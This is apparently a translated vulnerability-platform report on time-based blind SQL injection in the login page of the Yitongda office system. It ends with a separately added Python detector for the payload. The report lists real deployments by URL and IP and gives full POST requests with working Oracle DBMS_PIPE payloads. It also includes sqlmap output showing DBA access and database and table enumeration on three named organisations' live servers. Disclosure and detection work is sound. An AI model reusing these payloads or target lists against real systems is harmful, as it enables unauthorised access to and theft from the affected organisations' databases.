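2014-10-15: Details reported to the vendor; awaiting vendor handling
2014-10-20: Vendor confirmed; details disclosed to the vendor only
2014-10-23: Details opened to third-party security partners
2014-12-14: Details disclosed to core white hats and experts in related fields
2014-12-24: Details disclosed to regular white hats
2015-01-03: Details disclosed to intern white hats
2015-01-13: Details disclosed to the public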
Quick, tell me: which school teaches excavator skills best?
Product name: 易通达综合办公系统 (Yitongda Integrated Office System)
Official site introduction: http://oa.fj.bnet.cn/oa/homepage/index_prod_intro.jsp (nearly 4,000 customers)
Customer cases: http://oa.fj.bnet.cn/oa/homepage/index_prod_sample.jsp
The login page is vulnerable to AND/OR time-based blind SQL injection. The official site says it has nearly 4,000 customers. Searching Google and Baidu for the keyword 易通达综合办公系统 turns up these:

http://oa.fj.bnet.cn/oa/homepage/index.jsp
http://www.ahomehotel.com:8081/oa/login.jsp  A Home hotel chain
http://hlbg.flylong.com.cn:8081/oa/login.jsp  Huilong Group
http://61.131.50.27:8081/oa/login.jsp  Nan'an Education Bureau office platform
http://oa.doone.com.cn/oa/login.jsp
http://220.161.217.98:8082/oa/login.jsp
http://222.77.67.205:8080/oa/login.jsp  Haixi Informatization Cooperation Alliance
http://222.77.63.70:8081/oa/login.jsp  Xiduoduo Group Co., Ltd.
http://218.66.159.28:8081/oa/login.jsp  Quanzhou Port Group, Houzhu Branch
http://202.101.116.81/oa/login.jsp
Proof 1: testing the official site first, http://oa.fj.bnet.cn/oa/homepage/index.jsp

POST request:

POST /oa/LoginCheck HTTP/1.1
Host: oa.fj.bnet.cn:8082
Proxy-Connection: keep-alive
Content-Length: 33
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://oa.fj.bnet.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://oa.fj.bnet.cn/oa/homepage/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: JSESSIONID=5A75D4112E7D698290D1399010C961BE; JSESSIONID=391456841B314A4C7416D9219E15276D

ACCOUNT=a&STAFFID=a&PWD=a&v_code=

sqlmap:

sqlmap identified the following injection points with a total of 703 HTTP(s) requests:
---
Place: POST
Parameter: ACCOUNT
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: ACCOUNT=a') AND 2988=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(117)||CHR(119)||CHR(99),5) AND ('OvqL'='OvqL&STAFFID=a&PWD=a&v_code=

Place: POST
Parameter: STAFFID
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: ACCOUNT=a&STAFFID=a' AND 5773=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(68)||CHR(72)||CHR(102),5) AND 'zwXS'='zwXS&PWD=a&v_code=
---
back-end DBMS: Oracle
available databases [10]:
[*] BASEDBA
[*] COMPANY
[*] FLOWCFG
[*] INTER_SEARCH
[*] LBACSYS
[*] OLAPSYS
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] WMSYS

Tables in database BASEDBA: 612

[19:40:42] [INFO] fetching tables for database: 'BASEDBA'
[19:40:42] [INFO] fetching number of tables for database 'BASEDBA'
[19:40:42] [INFO] resumed: 612
[19:40:42] [INFO] resuming partial value: PB
[19:40:42] [INFO] retrieved: _TEST
[19:41:20] [INFO] retrieved: SMS_BAT
Proof 2: http://www.ahomehotel.com:8081/oa/login.jsp

POST request:

POST /oa/LoginCheck HTTP/1.1
Host: www.ahomehotel.com:8081
Proxy-Connection: keep-alive
Content-Length: 23
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.ahomehotel.com:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.ahomehotel.com:8081/oa/login.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: JSESSIONID=A1DBF76223853C155076CF845B3CA29E; last_login_date=2014/10/14/17; staff_code=a; password=; today_login_times=1

STAFFID=a&PWD=a&v_code=

sqlmap:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: STAFFID
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: STAFFID=a') AND 2145=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(77)||CHR(97)||CHR(81),5) AND ('NOWe'='NOWe&PWD=a&v_code=
---
back-end DBMS: Oracle
current user is DBA: True

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: STAFFID
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: STAFFID=a') AND 2145=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(77)||CHR(97)||CHR(81),5) AND ('NOWe'='NOWe&PWD=a&v_code=
---
back-end DBMS: Oracle
available databases [14]:
[*] BASEDBA
[*] CTXSYS
[*] DBSNMP
[*] FLOWCFG
[*] FLOWS_020100
[*] FLOWS_FILES
[*] HR
[*] INTER_SEARCH
[*] MDSYS
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] XDB

Tables in database BASEDBA: there are 426; not dumping them all here:

[18:11:50] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[18:11:50] [INFO] fetching tables for database: 'BASEDBA'
[18:11:50] [INFO] fetching number of tables for database 'BASEDBA'
[18:11:50] [INFO] resumed: 426
[18:11:50] [INFO] resumed: COMMON_COUNTER_TOTAL
[18:11:50] [INFO] resumed: COMPANY_ACCT
[18:11:50] [INFO] resumed: COMP_PHONE
[18:11:50] [INFO] resumed: COMP_TITLE
[18:11:50] [INFO] resumed: PATH
[18:11:50] [INFO] resumed: OFMESSAGEARCHIVE
[18:11:50] [INFO] resumed: PAPER_DEF
[18:11:50] [INFO] resumed: PAPER_INPUT_ITEM
[18:11:50] [INFO] resumed: PAPER_QUESTION
[18:11:50] [INFO] resumed: OFMUCAFFILIATION
[18:11:50] [INFO] resumed: PAPER_QUESTION_RESULT
[18:11:50] [INFO] resumed: PAPER_RESULT
[18:11:50] [INFO] resumed: OFMUCCONVERSATIONLOG
[18:11:50] [INFO] resumed: PAPER_USE_CFG
[18:11:50] [INFO] resumed: OFMUCMEMBER
[18:11:50] [INFO] resumed: NOTIFY_Q_READLIST
[18:11:50] [INFO] resumed: OA_DOC_BACK_LOG
[18:11:50] [INFO] resumed: PM_STAFF_SIGN
[18:11:50] [INFO] resumed: PATH_ERR
[18:11:50] [INFO] resumed: DDM_TOPIC_TREE
[18:11:50] [INFO] resumed: DEPT_DOC
[18:11:50] [INFO] resumed: DEPT_DOC_DIR_TREE
[18:11:50] [INFO] resumed: DEPT_DOC_PRIV
[18:11:50] [INFO] resumed: DEPT_DOC_READLIST
[18:11:50] [INFO] resumed: DEPT_FLOW_TYPE
[18:11:50] [INFO] resumed: COMMON_COUNTER_TOPIC
[18:11:50] [INFO] resumed: CONFERENCE\x02
[18:11:50] [INFO] resumed: CONTACT_CARD
[18:11:50] [INFO] resuming partial value: CONTACT_CARD_
Proof 3: http://222.77.63.70:8081/oa/login.jsp

POST request:

POST /oa/LoginCheck HTTP/1.1
Host: 222.77.63.70:8081
Proxy-Connection: keep-alive
Content-Length: 25
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://222.77.63.70:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://222.77.63.70:8081/oa/login.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: JSESSIONID=EF700AD15D2F63D8560AC7E162A08398; staff_code=aa; password=; last_login_date=2014/10/14/18; today_login_times=0

STAFFID=aa&PWD=aa&v_code=

sqlmap:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: STAFFID
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: STAFFID=aa') AND 6257=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(78)||CHR(86)||CHR(101),5) AND ('Nijd'='Nijd&PWD=aa&v_code=
---
back-end DBMS: Oracle
current user is DBA: True
available databases [14]:
[*] BASEDBA
[*] CTXSYS
[*] DBSNMP
[*] FLOWCFG
[*] FLOWS_020100
[*] FLOWS_FILES
[*] HR
[*] INTER_SEARCH
[*] MDSYS
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] XDB
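A defender-side check for the payload pattern seen in the three proofs above, as an added example that is not part of the original report: it parses form-encoded LoginCheck bodies, flags login fields carrying an Oracle DBMS_PIPE.RECEIVE_MESSAGE call, and compares the response time with the requested delay. The record layout (body, elapsed seconds), the elapsed values, the `o'brien` control sample and the function names are assumptions made for the example; the payload strings are the ones sqlmap printed above.

```python
import re
from urllib.parse import parse_qsl

# Fields posted to /oa/LoginCheck in the requests shown above.
LOGIN_FIELDS = {"ACCOUNT", "STAFFID", "PWD"}

# DBMS_PIPE.RECEIVE_MESSAGE(<pipe name>, <timeout>) blocks for <timeout> seconds
# when the pipe is empty; that timeout is the delay the payloads above request.
DELAY_CALL = re.compile(
    r"DBMS_PIPE\s*\.\s*RECEIVE_MESSAGE\s*\(.*,\s*(\d+)\s*\)", re.I | re.S)

def inspect_login_body(body):
    """Return (field, requested_delay_seconds) for each suspicious login field."""
    hits = []
    # parse_qsl also URL-decodes, so encoded wire traffic is handled the same way.
    for field, value in parse_qsl(body, keep_blank_values=True):
        match = DELAY_CALL.search(value) if field in LOGIN_FIELDS else None
        if match:
            hits.append((field, int(match.group(1))))
    return hits

def triage(records):
    """Label each hit 'executed' when the response took at least the requested
    delay (consistent with the injected call having run), else 'attempt'."""
    results = []
    for body, elapsed in records:
        for field, delay in inspect_login_body(body):
            verdict = "executed" if elapsed >= delay else "attempt"
            results.append((field, delay, verdict))
    return results

# Constructed records: (request body, response time in seconds). Bodies reuse the
# payloads quoted in the report; the timings and the o'brien sample are invented.
SAMPLES = [
    ("ACCOUNT=a&STAFFID=a&PWD=a&v_code=", 0.12),
    ("ACCOUNT=a') AND 2988=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(117)||"
     "CHR(119)||CHR(99),5) AND ('OvqL'='OvqL&STAFFID=a&PWD=a&v_code=", 5.31),
    ("ACCOUNT=a&STAFFID=a' AND 5773=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(68)||"
     "CHR(72)||CHR(102),5) AND 'zwXS'='zwXS&PWD=a&v_code=", 0.20),
    ("STAFFID=o'brien&PWD=a&v_code=", 0.10),  # lone quote, no delay call
]

if __name__ == "__main__":
    for row in triage(SAMPLES):
        print(row)
```

Flagging requests only detects probing; the query behind LoginCheck still has to use bind variables instead of string concatenation.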
Ask Lanxiang.
Severity: High
Vulnerability Rank: 10
Confirmed at: 2014-10-20 10:03
None yet